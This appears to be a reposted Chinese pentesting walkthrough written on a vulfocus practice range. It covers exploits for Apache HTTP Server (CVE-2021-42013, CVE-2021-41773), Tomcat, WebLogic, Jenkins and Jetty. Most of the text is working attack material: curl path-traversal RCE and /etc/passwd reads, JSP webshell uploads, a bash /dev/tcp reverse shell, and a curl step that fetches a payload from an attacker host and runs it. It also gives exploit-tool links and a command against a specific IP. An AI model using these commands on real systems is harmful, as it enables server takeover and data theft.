靶场:
vulfocus
Apache
Apache HTTP Server是美国阿帕奇(Apache)基金会的一款开源网页服务器。该服务器具有快速、可靠且可通过简单的API进行扩充的特点,发现 Apache HTTP Server2.4.50 中针对 CVE-2021-41773 的修复不够充分。攻击者可以使用路径遍历攻击将 URL 映射到由类似别名的指令配置的目录之外的文件。如果这些目录之外的文件不受通常的默认配置“要求全部拒绝”的保护,则这些请求可能会成功。如果还为这些别名路径启用了 CGI 脚本,则这可能允许远程代码执行。此问题仅影响 Apache2.4.49 和 Apache2.4.50,而不影响更早版本。
CVE-2021-42013(RCE)
利用:
方式一:
curl --data "echo;id" 'http://192.168.222.8:54778//cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh'
id就是我们要执行的命令
方式二:
直接以post方式提交数据包。数据就是要执行的命令。
POST /cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh
通过执行命令我们也可以反弹shell。
CVE-2021-41773(目录穿越)
Apache HTTP Server 2.4.49、2.4.50版本对路径规范化所做的更改中存在一个路径穿越漏洞,攻击者可利用该漏洞读取到Web目录外的其他文件,如系统配置文件、网站源码等,甚至在特定情况下,攻击者可构造恶意请求执行命令,控制服务器。
利用:
方式一:
curl -v --path-as-is
'http://xx.xx.xx.xx/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd' 读取etc.passwd文件
成功读取/etc/passwd文件内容:
方式二:
利用BP直接发送数据包:
Tomcat
弱口令
这里有个后台管理功能,我们可以弱口令或者爆破进入后台。(默认:tomcat tomcat)
在后台有一个上传文件的功能。
我们可以生成一个jsp后门代码(1.jsp),然后压缩成war文件(1.war)。
CVE-2017-12615(文件上传)
Tomcat 是一个小型的轻量级应用服务器,在中小型系统和并发访问用户不是很多的场合下被普遍使用,是开发和调试JSP 程序的首选。 攻击者将有可能可通过精心构造的攻击请求数据包向服务器上传包含任意代码的 JSP 的webshell文件,JSP文件中的恶意代码将能被服务器执行,导致服务器上的数据泄露或获取服务器权限。
影响版本:ApacheTomcat7.0.0-7.0.79
利用:
直接抓取数据包,然后以PUT形式提交数据包(数据包可以是一个后门代码)
发送该数据包之后就会创建一个1.jsp文件。
CVE-2020-1938(文件包含)
ApacheTomcat AJP协议(默认8009端口)由于存在实现缺陷导致相关参数可控,攻击者利用该漏洞可通过构造特定参数,读取服务器webapp目录下的任意文件。若服务器端同时存在文件上传功能,攻击者可进一步结合文件包含实现远程代码的执行。
漏洞影响的产品版本包括:
Tomcat6.*
Tomcat7.*<7.0.100
Tomcat8.*<8.5.51
Tomcat9.*<9.0.31
利用:
脚本:https://github.com/YDHCUI/CNVD-2020-10487-Tomcat-Ajp-lfi
python .\CNVD-2020-10487-Tomcat-Ajp-lfi.py 47.98.193.176-p 35839-f WEB-INF/web.xml
使用python2
Weblogic
默认端口:7001
如果我们发现目标地址使用weblogic,可以直接使用工具直接来检测是否存在漏洞。
工具:https://github.com/KimJun1010/WeblogicTool 狐狸工具箱也有
jenkins
Jenkins是一个开源软件项目,是基于Java开发的一种持续集成工具,用于监控持续重复的工作。
探针默认端口:8080
CVE-2017-1000353
Jenkins 可以通过其网页界面轻松设置和配置,其中包括即时错误检查和内置帮助。 插件 通过更新中心中的 1000 多个插件,Jenkins 集成了持续集成和持续交付工具链中几乎所有的工具。 Jenkins的反序列化漏洞,攻击者使用该漏洞可以在被攻击服务器执行任意代码,漏洞利用不需要任何的权限。
利用:
- 首先对待执行的反弹shell命令进行base64编码(bash -i >& /dev/tcp/x.x.x.x/端口 0>&1)
- java -jar CVE-2017-1000353-1.1-SNAPSHOT-all.jar jenkins_poc.ser "bash -c {echo,上面的base64编码值}|{base64,-d}|{bash,-i}" //在当前目录下生成一个jenkins_poc.ser文件,jdk使用1.8_291版本
- python exploit.py 目标地址 jenkins_poc.ser 在此之前记得攻击机nc接听端口
工具:http://github.com/vulhub/CVE-2017-1000353
CVE-2018-1000861
Jenkins 可以通过其网页界面轻松设置和配置,其中包括即时错误检查和内置帮助。 插件 通过更新中心中的 1000 多个插件,Jenkins 集成了持续集成和持续交付工具链中几乎所有的工具。 Jenkins 是常见的CI/CD服务器, 最常见的就是爆破弱口令然后使用groovy执行命令。
利用:
- 首先在攻击机中创建一个文本文件(1.txt),在文件中写入反弹shell命令( bash -i >& /dev/tcp/x.x.x.x/端口 0>&1 )
- python3 -m http.server 8888 在该目录下利用python启动服务,远程可访问1.txt
python2 exp.py http://目标地址/ "curl -o /tmp/1.sh http://x.x.x.x:8888/1.txt"
- python2 exp.py http://目标地址/ "bash /tmp/1.sh"
工具:https://github.com/adamyordan/cve-2019-1003000-jenkins-rce-poc
jetty
Jetty是一个开源的servlet容器,它为基于Java的Web容器提供运行环境。
它的漏洞就是敏感信息的泄露。我们可以访问下面的url
/%2e/WEB-INF/web.xml
/.%00/WEB-INF/web.xml
/%u002e/WEB-INF/web.xml
/static?/WEB-INF/web.xml
/a/b/..%00/WEB-INF/web.
版权归原作者 凌晨四点半sec 所有, 如有侵权,请联系我们删除。